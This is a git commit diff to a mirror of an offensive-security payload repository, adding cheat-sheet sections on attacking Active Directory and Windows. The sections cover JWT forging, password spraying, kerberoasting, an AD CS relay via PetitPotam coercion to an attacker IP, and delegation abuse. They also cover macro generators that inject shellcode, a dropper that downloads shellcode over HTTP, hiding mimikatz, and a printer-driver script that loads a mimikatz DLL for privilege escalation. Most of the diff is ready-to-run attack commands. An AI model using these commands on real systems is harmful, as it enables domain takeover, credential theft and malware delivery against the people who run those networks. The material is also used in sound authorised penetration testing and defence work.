mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
DB2 Injection + ADCS
This commit is contained in:
parent
01f2a02c52
commit
87be30d3b2
@ -6,6 +6,8 @@
|
||||
|
||||
- [Tools](#tools)
|
||||
- [JWT Format](#jwt-format)
|
||||
- [Header](#header)
|
||||
- [Payload](#payload)
|
||||
- [JWT Signature - None algorithm](#jwt-signature---none-algorithm)
|
||||
- [JWT Signature - RS256 to HS256](#jwt-signature---rs256-to-hs256)
|
||||
- [Breaking JWT's secret](#breaking-jwts-secret)
|
||||
@ -188,6 +190,7 @@ First, bruteforce the "secret" key used to compute the signature.
|
||||
|
||||
```powershell
|
||||
git clone https://github.com/ticarpi/jwt_tool
|
||||
python3 -m pip install termcolor cprint pycryptodomex requests
|
||||
python3 jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwicm9sZSI6InVzZXIiLCJpYXQiOjE1MTYyMzkwMjJ9.1rtMXfvHSjWuH6vXBCaLLJiBghzVrLJpAQ6Dl5qD4YI -d /tmp/wordlist -C
|
||||
|
||||
\ \ \ \ \ \
|
||||
@ -249,6 +252,13 @@ Your new forged token:
|
||||
[+] Standard: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNTE2MjM5MDIyfQ.xbUXlOQClkhXEreWmB3da/xtBsT0Kjw7truyhDwF5Ic
|
||||
```
|
||||
|
||||
* Recon: `python3 jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.aqNCvShlNT9jBFTPBpHDbt2gBB1MyHiisSDdp8SQvgw`
|
||||
* Scanning: `python3 jwt_tool.py -t https://www.ticarpi.com/ -rc "jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po;anothercookie=test" -M pb`
|
||||
* Exploitation: `python3 jwt_tool.py -t https://www.ticarpi.com/ -rc "jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po;anothercookie=test" -X i -I -pc name -pv admin`
|
||||
* Fuzzing: `python3 jwt_tool.py -t https://www.ticarpi.com/ -rc "jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po;anothercookie=test" -I -hc kid -hv custom_sqli_vectors.txt`
|
||||
* Review: `python3 jwt_tool.py -t https://www.ticarpi.com/ -rc "jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po;anothercookie=test" -X i -I -pc name -pv admin`
|
||||
|
||||
|
||||
### JWT cracker
|
||||
|
||||
```bash
|
||||
@ -266,6 +276,14 @@ Secret is "Sn1f"
|
||||
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMj...Fh7HgQ:secret
|
||||
```
|
||||
|
||||
## CVE
|
||||
|
||||
* CVE-2015-2951 - The alg=none signature-bypass vulnerability
|
||||
* CVE-2016-10555 - The RS/HS256 public key mismatch vulnerability
|
||||
* CVE-2018-0114 - Key injection vulnerability
|
||||
* CVE-2019-20933/CVE-2020-28637 - Blank password vulnerability
|
||||
* CVE-2020-28042 - Null signature vulnerability
|
||||
|
||||
## References
|
||||
|
||||
- [Hacking JSON Web Token (JWT) - Hate_401](https://medium.com/101-writeups/hacking-json-web-token-jwt-233fe6c862e6)
|
||||
|
@ -81,6 +81,8 @@
|
||||
- [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking)
|
||||
- [Forest to Forest Compromise - Trust Ticket](#forest-to-forest-compromise---trust-ticket)
|
||||
- [Kerberos Unconstrained Delegation](#kerberos-unconstrained-delegation)
|
||||
- [SpoolService Abuse with Unconstrained Delegation](#spoolservice-abuse-with-unconstrained-delegation)
|
||||
- [MS-EFSRPC Abuse with Unconstrained Delegation](#ms---efsrpc-abuse-with-unconstrained-delegation)
|
||||
- [Kerberos Constrained Delegation](#kerberos-constrained-delegation)
|
||||
- [Kerberos Resource Based Constrained Delegation](#kerberos-resource-based-constrained-delegation)
|
||||
- [Kerberos Bronze Bit Attack - CVE-2020-17049](#kerberos-bronze-bit-attack---cve-2020-17049)
|
||||
@ -1058,65 +1060,64 @@ Password spraying refers to the attack method that takes a large number of usern
|
||||
|
||||
Most of the time the best passwords to spray are :
|
||||
|
||||
- P@ssw0rd01, Password123, mimikatz
|
||||
- P@ssw0rd01, Password123, Password1, Hello123, mimikatz
|
||||
- Welcome1/Welcome01
|
||||
- $Companyname1 : $Microsoft1
|
||||
- SeasonYear : Winter2019*,Spring2020!,Summer2018?
|
||||
- SeasonYear : Winter2019*, Spring2020!, Summer2018?, Summer2020, July2020!
|
||||
- Default AD password with simple mutations such as number-1, special character iteration (*,?,!,#)
|
||||
|
||||
|
||||
#### Kerberos pre-auth bruteforcing
|
||||
|
||||
Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.
|
||||
|
||||
> Kerberos pre-authentication errors are not logged in Active Directory with a normal **Logon failure event (4625)**, but rather with specific logs to **Kerberos pre-authentication failure (4771)**.
|
||||
|
||||
```powershell
|
||||
# Username bruteforce
|
||||
root@kali:~$ ./kerbrute_linux_amd64 userenum -d domain.local --dc 10.10.10.10 usernames.txt
|
||||
|
||||
# Password brute
|
||||
root@kali:~$ ./kerbrute_linux_amd64 bruteuser -d domain.local --dc 10.10.10.10 rockyou.txt username
|
||||
|
||||
# Password spray
|
||||
root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt Password123
|
||||
root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt rockyou.txt
|
||||
root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt '123456' -v --delay 100 -o kerbrute-passwordspray-123456.log
|
||||
```
|
||||
* Username bruteforce
|
||||
```powershell
|
||||
root@kali:~$ ./kerbrute_linux_amd64 userenum -d domain.local --dc 10.10.10.10 usernames.txt
|
||||
```
|
||||
* Password bruteforce
|
||||
```powershell
|
||||
root@kali:~$ ./kerbrute_linux_amd64 bruteuser -d domain.local --dc 10.10.10.10 rockyou.txt username
|
||||
```
|
||||
* Password spray
|
||||
```powershell
|
||||
root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt Password123
|
||||
root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt rockyou.txt
|
||||
root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt '123456' -v --delay 100 -o kerbrute-passwordspray-123456.log
|
||||
```
|
||||
|
||||
#### Spray a pre-generated passwords list
|
||||
|
||||
Using `crackmapexec` and `mp64` to generate passwords and spray them against SMB services on the network.
|
||||
|
||||
```powershell
|
||||
crackmapexec smb 10.0.0.1/24 -u Administrator -p `(./mp64.bin Pass@wor?l?a)`
|
||||
```
|
||||
|
||||
Using `DomainPasswordSpray` to spray a password against all users of a domain.
|
||||
|
||||
```powershell
|
||||
# https://github.com/dafthack/DomainPasswordSpray
|
||||
Invoke-DomainPasswordSpray -Password Summer2021!
|
||||
|
||||
# /!\ be careful with the account lockout !
|
||||
Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt
|
||||
|
||||
```
|
||||
* Using `crackmapexec` and `mp64` to generate passwords and spray them against SMB services on the network.
|
||||
```powershell
|
||||
crackmapexec smb 10.0.0.1/24 -u Administrator -p `(./mp64.bin Pass@wor?l?a)`
|
||||
```
|
||||
* Using `DomainPasswordSpray` to spray a password against all users of a domain.
|
||||
```powershell
|
||||
# https://github.com/dafthack/DomainPasswordSpray
|
||||
Invoke-DomainPasswordSpray -Password Summer2021!
|
||||
# /!\ be careful with the account lockout !
|
||||
Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt
|
||||
```
|
||||
* Using `SMBAutoBrute`.
|
||||
```powershell
|
||||
Invoke-SMBAutoBrute -UserList "C:\ProgramData\admins.txt" -PasswordList "Password1, Welcome1, 1qazXDR%+" -LockoutThreshold 5 -ShowVerbose
|
||||
```
|
||||
|
||||
#### Spray passwords against the RDP service
|
||||
|
||||
Using RDPassSpray to target RDP services.
|
||||
|
||||
```powershell
|
||||
git clone https://github.com/xFreed0m/RDPassSpray
|
||||
python3 RDPassSpray.py -u [USERNAME] -p [PASSWORD] -d [DOMAIN] -t [TARGET IP]
|
||||
```
|
||||
|
||||
Using hydra and ncrack to target RDP services.
|
||||
|
||||
```powershell
|
||||
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://10.10.10.10
|
||||
ncrack –connection-limit 1 -vv --user administrator -P password-file.txt rdp://10.10.10.10
|
||||
```
|
||||
* Using RDPassSpray to target RDP services.
|
||||
```powershell
|
||||
git clone https://github.com/xFreed0m/RDPassSpray
|
||||
python3 RDPassSpray.py -u [USERNAME] -p [PASSWORD] -d [DOMAIN] -t [TARGET IP]
|
||||
```
|
||||
* Using hydra and ncrack to target RDP services.
|
||||
```powershell
|
||||
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://10.10.10.10
|
||||
ncrack –connection-limit 1 -vv --user administrator -P password-file.txt rdp://10.10.10.10
|
||||
```
|
||||
|
||||
#### BadPwdCount attribute
|
||||
|
||||
@ -1411,6 +1412,13 @@ Any valid domain user can request a kerberos ticket (TGS) for any domain service
|
||||
./bifrost -action asktgs -ticket doIF<...snip...>QUw= -service host/dc1-lab.lab.local -kerberoast true
|
||||
```
|
||||
|
||||
* [targetedKerberoast](https://github.com/ShutdownRepo/targetedKerberoast)
|
||||
```powershell
|
||||
# for each user without SPNs, it tries to set one (abuse of a write permission on the servicePrincipalName attribute),
|
||||
# print the "kerberoast" hash, and delete the temporary SPN set for that operation
|
||||
targetedKerberoast.py [-h] [-v] [-q] [-D TARGET_DOMAIN] [-U USERS_FILE] [--request-user username] [-o OUTPUT_FILE] [--use-ldaps] [--only-abuse] [--no-abuse] [--dc-ip ip address] [-d DOMAIN] [-u USER] [-k] [--no-pass | -p PASSWORD | -H [LMHASH:]NTHASH | --aes-key hex key]
|
||||
```
|
||||
|
||||
|
||||
Then crack the ticket using the correct hashcat mode (`$krb5tgs$23`= `etype 23`)
|
||||
|
||||
@ -1765,13 +1773,15 @@ Terminal> psexec.py 'LAB/winrm_user_1:Password123!@192.168.83.135'
|
||||
|
||||
#### AD CS Relay Attack
|
||||
|
||||
> An attacker can trigger a Domain Controller using PetitPotam to NTLM relay credentials to a host of choice. The Domain Controller’s NTLM Credentials can then be relayed to the Active Directory Certificate Services (AD CS) Web Enrollment pages, and a DC certificate can be enrolled. This certificate can then be used to request a TGT (Ticket Granting Ticket) and compromise the entire domain through Pass-The-Ticket.
|
||||
|
||||
Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101)
|
||||
|
||||
* Version 1: NTLM Relay + Rubeus + PetitPotam
|
||||
```powershell
|
||||
impacket> python3 ntlmrelayx.py -t http://<ca-server>/certsrv/certfnsh.asp -smb2support --adcs
|
||||
impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template workstation
|
||||
# template workstation, DomainController, Machine
|
||||
# Templates: workstation, DomainController, Machine; KerberosAuthentication
|
||||
|
||||
# Coerce the authentication via MS-ESFRPC EfsRpcOpenFileRaw function with petitpotam
|
||||
# You can also use any other way to coerce the authentication like PrintSpooler via MS-RPRN
|
||||
@ -2289,6 +2299,22 @@ Then you can use DCsync or another attack : `mimikatz # lsadump::dcsync /user:HA
|
||||
* Ensure sensitive accounts cannot be delegated
|
||||
* Disable the Print Spooler Service
|
||||
|
||||
|
||||
#### MS-EFSRPC Abuse with Unconstrained Delegation
|
||||
|
||||
Using `PetitPotam`, another tool to coerce a callback from the targeted machine, instead of `SpoolSample`.
|
||||
|
||||
```powershell
|
||||
# Coerce the callback
|
||||
git clone https://github.com/topotam/PetitPotam
|
||||
python3 petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP
|
||||
python3 petitpotam.py -d '' -u '' -p '' $ATTACKER_IP $TARGET_IP
|
||||
|
||||
# Extract the ticket
|
||||
.\Rubeus.exe asktgs /ticket:<ticket base64> /ptt
|
||||
```
|
||||
|
||||
|
||||
### Kerberos Constrained Delegation
|
||||
|
||||
> Request a Kerberos ticket which allows us to exploit delegation configurations, we can once again use Impackets getST.py script, however,
|
||||
@ -2303,25 +2329,19 @@ $ Get-DomainComputer -TrustedToAuth | select -exp dnshostname
|
||||
$ Get-DomainComputer previous_result | select -exp msds-AllowedToDelegateTo
|
||||
```
|
||||
|
||||
#### Exploit with Impacket
|
||||
```ps1
|
||||
$ getST.py -spn HOST/SQL01.DOMAIN 'DOMAIN/user:password' -impersonate Administrator -dc-ip 10.10.10.10
|
||||
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
|
||||
#### Exploit the Constrained Delegation
|
||||
|
||||
[*] Getting TGT for user
|
||||
[*] Impersonating Administrator
|
||||
[*] Requesting S4U2self
|
||||
[*] Requesting S4U2Proxy
|
||||
[*] Saving ticket in Administrator.ccache
|
||||
```
|
||||
|
||||
#### Exploit with Rubeus
|
||||
```ps1
|
||||
$ ./Rubeus.exe tgtdeleg /nowrap # this ticket can be used with /ticket:...
|
||||
$ ./Rubeus.exe s4u /user:user_for_delegation /rc4:user_pwd_hash /impersonateuser:user_to_impersonate /domain:domain.com /dc:dc01.domain.com /msdsspn:cifs/srv01.domain.com /ptt
|
||||
$ ./Rubeus.exe s4u /user:MACHINE$ /rc4:MACHINE_PWD_HASH /impersonateuser:Administrator /msdsspn:"cifs/dc.domain.com" /altservice:cifs,http,host,rpcss,wsman,ldap /ptt
|
||||
$ dir \\dc.domain.com\c$
|
||||
```
|
||||
* Impacket
|
||||
```ps1
|
||||
$ getST.py -spn HOST/SQL01.DOMAIN 'DOMAIN/user:password' -impersonate Administrator -dc-ip 10.10.10.10
|
||||
```
|
||||
* Rubeus
|
||||
```ps1
|
||||
$ ./Rubeus.exe tgtdeleg /nowrap # this ticket can be used with /ticket:...
|
||||
$ ./Rubeus.exe s4u /user:user_for_delegation /rc4:user_pwd_hash /impersonateuser:user_to_impersonate /domain:domain.com /dc:dc01.domain.com /msdsspn:cifs/srv01.domain.com /ptt
|
||||
$ ./Rubeus.exe s4u /user:MACHINE$ /rc4:MACHINE_PWD_HASH /impersonateuser:Administrator /msdsspn:"cifs/dc.domain.com" /altservice:cifs,http,host,rpcss,wsman,ldap /ptt
|
||||
$ dir \\dc.domain.com\c$
|
||||
```
|
||||
|
||||
#### Impersonate a domain user on a resource
|
||||
|
||||
@ -2851,4 +2871,6 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
|
||||
* [AD CS relay attack - practical guide - 23 Jun 2021 - @exandroiddev](https://www.exandroid.dev/2021/06/23/ad-cs-relay-attack-practical-guide/)
|
||||
* [Shadow Credentials: Abusing Key Trust Account Mapping for Account Takeover - Elad Shamir - Jun 17](https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab#Previous%20Work)
|
||||
* [Playing with PrintNightmare - 0xdf - Jul 8, 2021](https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html)
|
||||
* [Attacking Active Directory: 0 to 0.9 - Eloy Pérez González - 2021/05/29](https://zer1t0.gitlab.io/posts/attacking_ad/)
|
||||
* [Attacking Active Directory: 0 to 0.9 - Eloy Pérez González - 2021/05/29](https://zer1t0.gitlab.io/posts/attacking_ad/)
|
||||
* [Microsoft ADCS – Abusing PKI in Active Directory Environment - Jean MARSAULT - 14/06/2021](https://www.riskinsight-wavestone.com/en/2021/06/microsoft-adcs-abusing-pki-in-active-directory-environment/)
|
||||
* [Certified Pre-Owned - Will Schroeder and Lee Christensen - June 17, 2021](http://www.harmj0y.net/blog/activedirectory/certified-pre-owned/)
|
File diff suppressed because it is too large
Load Diff
@ -36,6 +36,7 @@ $ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstri
|
||||
* [Persistence Kit](#persistence-kit)
|
||||
* [Resource Kit](#resource-kit)
|
||||
* [Artifact Kit](#artifact-kit)
|
||||
* [Mimikatz Kit](#mimikatz-kit)
|
||||
* [References](#references)
|
||||
|
||||
|
||||
@ -402,6 +403,8 @@ beacon> spunnel_local x64 127.0.0.1 4444 C:\Payloads\msf.bin
|
||||
|
||||
## Kits
|
||||
|
||||
* [Cobalt Strike Community Kit](https://cobalt-strike.github.io/community_kit/) - Community Kit is a central repository of extensions written by the user community to extend the capabilities of Cobalt Strike
|
||||
|
||||
### Elevate Kit
|
||||
|
||||
UAC Token Duplication : Fixed in Windows 10 Red Stone 5 (October 2018)
|
||||
@ -463,6 +466,12 @@ Artifact Kit (Cobalt Strike 4.0) - https://www.youtube.com/watch?v=6mC21kviwG4 :
|
||||
- Build the Artifact
|
||||
- Cobalt Strike -> Script Manager > Load .cna
|
||||
|
||||
### Mimikatz Kit
|
||||
|
||||
* Download and extract the .tgz from the Arsenal (Note: The version uses the Mimikatz release version naming (i.e., 2.2.0.20210724)
|
||||
* Load the mimikatz.cna aggressor script
|
||||
* Use mimikatz functions as normal
|
||||
|
||||
## References
|
||||
|
||||
* [Red Team Ops with Cobalt Strike (1 of 9): Operations](https://www.youtube.com/watch?v=q7VQeK533zI)
|
||||
|
@ -17,6 +17,7 @@
|
||||
* [DCOM - WMI COM functions (VBA AMSI)](#docm---wmi-com-functions)
|
||||
* [DOCM - winmgmts](#docm---winmgmts)
|
||||
* [DOCM - Macro Pack - Macro and DDE](#docmxlm---macro-pack---macro-and-dde)
|
||||
* [DOCM - BadAssMacros](#docm---badassmacros)
|
||||
* [DOCM - CACTUSTORCH VBA Module](#docm---cactustorch-vba-module)
|
||||
* [DOCM - MMG with Custom DL + Exec](#docm---mmg-with-custom-dl--exec)
|
||||
* [VBA Obfuscation](#vba-obfuscation)
|
||||
@ -326,8 +327,7 @@ SW.Document.Application.ShellExecute "cmd.exe", "/c powershell.exe", "C:\Windows
|
||||
|
||||
> Only the community version is available online.
|
||||
|
||||
* git clone https://github.com/sevagas/macro_pack
|
||||
* https://github.com/sevagas/macro_pack/releases/download/v2.0.1/macro_pack.exe
|
||||
* [https://github.com/sevagas/macro_pack](https://github.com/sevagas/macro_pack/releases/download/v2.0.1/macro_pack.exe)
|
||||
|
||||
```powershell
|
||||
# Options
|
||||
@ -385,6 +385,29 @@ echo "x86.bin" "x64.bin" | macro_pack.exe -t AUTOSHELLCODE -o –autopack -G sc_
|
||||
echo "http://192.168.5.10:8080/x32calc.bin" "http://192.168.5.10:8080/x64calc.bin" | macro_pack.exe -t DROPPER_SHELLCODE -o --shellcodemethod=ClassicIndirect -G samples\sc_dl.xls
|
||||
```
|
||||
|
||||
## DOCM - BadAssMacros
|
||||
|
||||
> C# based automated Malicous Macro Generator.
|
||||
|
||||
* https://github.com/Inf0secRabbit/BadAssMacros
|
||||
|
||||
```powershell
|
||||
BadAssMacros.exe -h
|
||||
|
||||
# Create VBA for classic shellcode injection from raw shellcode
|
||||
BadAssMacros.exe -i <path_to_raw_shellcode_file> -w <doc/excel> -p no -s classic -c <caesar_shift_value> -o <path_to_output_file>
|
||||
BadAssMacros.exe -i .\Desktop\payload.bin -w doc -p no -s classic -c 23 -o .\Desktop\output.txt
|
||||
|
||||
# Create VBA for indirect shellcode injection from raw shellcode
|
||||
BadAssMacros.exe -i <path_to_raw_shellcode_file> -w <doc/excel> -p no -s indirect -o <path_to_output_file>
|
||||
|
||||
# List modules inside Doc/Excel file
|
||||
BadAssMacros.exe -i <path_to_doc/excel_file> -w <doc/excel> -p yes -l
|
||||
|
||||
# Purge Doc/Excel file
|
||||
BadAssMacros.exe -i <path_to_doc/excel_file> -w <doc/excel> -p yes -o <path_to_output_file> -m <module_name>
|
||||
```
|
||||
|
||||
|
||||
## DOCM - CACTUSTORCH VBA Module
|
||||
|
||||
|
@ -33,6 +33,7 @@ Mimikatz console (multiple commands)
|
||||
```powershell
|
||||
PS C:\temp\mimikatz> .\mimikatz
|
||||
mimikatz # privilege::debug
|
||||
mimikatz # log
|
||||
mimikatz # sekurlsa::logonpasswords
|
||||
mimikatz # sekurlsa::wdigest
|
||||
```
|
||||
|
@ -3,6 +3,7 @@
|
||||
## Summary
|
||||
|
||||
* [Tools](#tools)
|
||||
* [Hide Your Binary](#hide-your-binary)
|
||||
* [Disable Windows Defender](#disable-windows-defender)
|
||||
* [Disable Windows Firewall](#disable-windows-firewall)
|
||||
* [Simple User](#simple-user)
|
||||
@ -34,6 +35,14 @@
|
||||
|
||||
- [SharPersist - Windows persistence toolkit written in C#. - @h4wkst3r](https://github.com/fireeye/SharPersist)
|
||||
|
||||
## Hide Your Binary
|
||||
|
||||
> Sets (+) or clears (-) the Hidden file attribute. If a file uses this attribute set, you must clear the attribute before you can change any other attributes for the file.
|
||||
|
||||
```ps1
|
||||
PS> attrib +h mimikatz.exe
|
||||
```
|
||||
|
||||
## Disable Windows Defender
|
||||
|
||||
```powershell
|
||||
|
@ -35,27 +35,32 @@
|
||||
* [EoP - AlwaysInstallElevated](#eop---alwaysinstallelevated)
|
||||
* [EoP - Insecure GUI apps](#eop---insecure-gui-apps)
|
||||
* [EoP - Evaluating Vulnerable Drivers](#eop---evaluating-vulnerable-drivers)
|
||||
* [EoP - Printers](#eop-printers)
|
||||
* [Universal Printer](#universal-printer)
|
||||
* [Bring Your Own Vulnerability](#bring-your-own-vulnerability)
|
||||
* [EoP - Runas](#eop---runas)
|
||||
* [EoP - Abusing Shadow Copies](#eop---abusing-shadow-copies)
|
||||
* [EoP - From local administrator to NT SYSTEM](#eop---from-local-administrator-to-nt-system)
|
||||
* [EoP - Living Off The Land Binaries and Scripts](#eop---living-off-the-land-binaries-and-scripts)
|
||||
* [EoP - Impersonation Privileges](#eop---impersonation-privileges)
|
||||
* [Restore A Service Account's Privileges](#restore-a-service-accounts-privileges)
|
||||
* [Meterpreter getsystem and alternatives](#meterpreter-getsystem-and-alternatives)
|
||||
* [RottenPotato (Token Impersonation)](#rottenpotato-token-impersonation)
|
||||
* [Juicy Potato (abusing the golden privileges)](#juicy-potato-abusing-the-golden-privileges)
|
||||
* [Restore A Service Account's Privileges](#restore-a-service-accounts-privileges)
|
||||
* [Meterpreter getsystem and alternatives](#meterpreter-getsystem-and-alternatives)
|
||||
* [RottenPotato (Token Impersonation)](#rottenpotato-token-impersonation)
|
||||
* [Juicy Potato (Abusing the golden privileges)](#juicy-potato-abusing-the-golden-privileges)
|
||||
* [Rogue Potato (Fake OXID Resolver)](#rogue-potato-fake-oxid-resolver))
|
||||
* [EFSPotato (MS-EFSR EfsRpcOpenFileRaw)](#efspotato-ms-efsr-efsrpcopenfileraw))
|
||||
* [EoP - Privileged File Write](#eop---privileged-file-write)
|
||||
* [DiagHub](#diaghub)
|
||||
* [UsoDLLLoader](#usodllloader)
|
||||
* [WerTrigger](#wertrigger)
|
||||
* [EoP - Common Vulnerabilities and Exposures](#eop---common-vulnerabilities-and-exposure)
|
||||
* [MS08-067 (NetAPI)](#ms08-067-netapi)
|
||||
* [MS10-015 (KiTrap0D)](#ms10-015-kitrap0d---microsoft-windows-nt2000--2003--2008--xp--vista--7)
|
||||
* [MS11-080 (adf.sys)](#ms11-080-afd.sys---microsoft-windows-xp-2003)
|
||||
* [MS15-051 (Client Copy Image)](#ms15-051---microsoft-windows-2003--2008--7--8--2012)
|
||||
* [MS16-032](#ms16-032---microsoft-windows-7--10--2008--2012-r2-x86x64)
|
||||
* [MS17-010 (Eternal Blue)](#ms17-010-eternal-blue)
|
||||
* [CVE-2019-1388](#cve-2019-1388)
|
||||
* [MS08-067 (NetAPI)](#ms08-067-netapi)
|
||||
* [MS10-015 (KiTrap0D)](#ms10-015-kitrap0d---microsoft-windows-nt2000--2003--2008--xp--vista--7)
|
||||
* [MS11-080 (adf.sys)](#ms11-080-afd.sys---microsoft-windows-xp-2003)
|
||||
* [MS15-051 (Client Copy Image)](#ms15-051---microsoft-windows-2003--2008--7--8--2012)
|
||||
* [MS16-032](#ms16-032---microsoft-windows-7--10--2008--2012-r2-x86x64)
|
||||
* [MS17-010 (Eternal Blue)](#ms17-010-eternal-blue)
|
||||
* [CVE-2019-1388](#cve-2019-1388)
|
||||
* [EoP - $PATH Interception](#eop---path-interception)
|
||||
* [References](#references)
|
||||
|
||||
@ -950,6 +955,67 @@ Citrix USB Filter Driver
|
||||
<SNIP>
|
||||
```
|
||||
|
||||
## EoP - Printers
|
||||
|
||||
### Universal Printer
|
||||
|
||||
Create a Printer
|
||||
|
||||
```ps1
|
||||
$printerName = 'Universal Priv Printer'
|
||||
$system32 = $env:systemroot + '\system32'
|
||||
$drivers = $system32 + '\spool\drivers'
|
||||
$RegStartPrinter = 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\Printers\' + $printerName
|
||||
|
||||
Copy-Item -Force -Path ($system32 + '\mscms.dll') -Destination ($system32 + '\mimispool.dll')
|
||||
Copy-Item -Force -Path '.\mimikatz_trunk\x64\mimispool.dll' -Destination ($drivers + '\x64\3\mimispool.dll')
|
||||
Copy-Item -Force -Path '.\mimikatz_trunk\win32\mimispool.dll' -Destination ($drivers + '\W32X86\3\mimispool.dll')
|
||||
|
||||
Add-PrinterDriver -Name 'Generic / Text Only'
|
||||
Add-Printer -DriverName 'Generic / Text Only' -Name $printerName -PortName 'FILE:' -Shared
|
||||
|
||||
New-Item -Path ($RegStartPrinter + '\CopyFiles') | Out-Null
|
||||
New-Item -Path ($RegStartPrinter + '\CopyFiles\Kiwi') | Out-Null
|
||||
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Directory' -PropertyType 'String' -Value 'x64\3' | Out-Null
|
||||
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Files' -PropertyType 'MultiString' -Value ('mimispool.dll') | Out-Null
|
||||
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Module' -PropertyType 'String' -Value 'mscms.dll' | Out-Null
|
||||
New-Item -Path ($RegStartPrinter + '\CopyFiles\Litchi') | Out-Null
|
||||
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Directory' -PropertyType 'String' -Value 'W32X86\3' | Out-Null
|
||||
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Files' -PropertyType 'MultiString' -Value ('mimispool.dll') | Out-Null
|
||||
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Module' -PropertyType 'String' -Value 'mscms.dll' | Out-Null
|
||||
New-Item -Path ($RegStartPrinter + '\CopyFiles\Mango') | Out-Null
|
||||
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Directory' -PropertyType 'String' -Value $null | Out-Null
|
||||
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Files' -PropertyType 'MultiString' -Value $null | Out-Null
|
||||
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Module' -PropertyType 'String' -Value 'mimispool.dll' | Out-Null
|
||||
```
|
||||
|
||||
Execute the driver
|
||||
|
||||
```ps1
|
||||
$serverName = 'dc.purple.lab'
|
||||
$printerName = 'Universal Priv Printer'
|
||||
$fullprinterName = '\\' + $serverName + '\' + $printerName + ' - ' + $(If ([System.Environment]::Is64BitOperatingSystem) {'x64'} Else {'x86'})
|
||||
Remove-Printer -Name $fullprinterName -ErrorAction SilentlyContinue
|
||||
Add-Printer -ConnectionName $fullprinterName
|
||||
```
|
||||
|
||||
### Bring Your Own Vulnerability
|
||||
|
||||
Concealed Position : https://github.com/jacob-baines/concealed_position
|
||||
|
||||
* ACIDDAMAGE - [CVE-2021-35449](https://nvd.nist.gov/vuln/detail/CVE-2021-35449) - Lexmark Universal Print Driver LPE
|
||||
* RADIANTDAMAGE - [CVE-2021-38085](https://nvd.nist.gov/vuln/detail/CVE-2021-38085) - Canon TR150 Print Driver LPE
|
||||
* POISONDAMAGE - [CVE-2019-19363](https://nvd.nist.gov/vuln/detail/CVE-2019-19363) - Ricoh PCL6 Print Driver LPE
|
||||
* SLASHINGDAMAGE - [CVE-2020-1300](https://nvd.nist.gov/vuln/detail/CVE-2020-1300) - Windows Print Spooler LPE
|
||||
|
||||
```powershell
|
||||
cp_server.exe -e ACIDDAMAGE
|
||||
# Get-Printer
|
||||
# Set the "Advanced Sharing Settings" -> "Turn off password protected sharing"
|
||||
cp_client.exe -r 10.0.0.9 -n ACIDDAMAGE -e ACIDDAMAGE
|
||||
cp_client.exe -l -e ACIDDAMAGE
|
